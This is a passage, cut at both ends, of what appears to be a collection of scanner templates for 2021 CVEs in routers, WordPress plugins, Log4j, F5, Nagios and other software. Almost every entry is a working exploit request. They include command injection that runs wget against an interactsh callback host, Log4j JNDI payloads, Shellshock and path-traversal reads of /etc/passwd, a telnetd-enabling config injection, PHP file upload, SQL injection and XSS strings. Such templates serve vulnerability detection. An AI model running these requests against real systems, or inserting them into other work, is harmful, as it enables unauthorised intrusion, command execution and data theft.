boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\n","GET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1","contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')"],"condition":"and"}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping 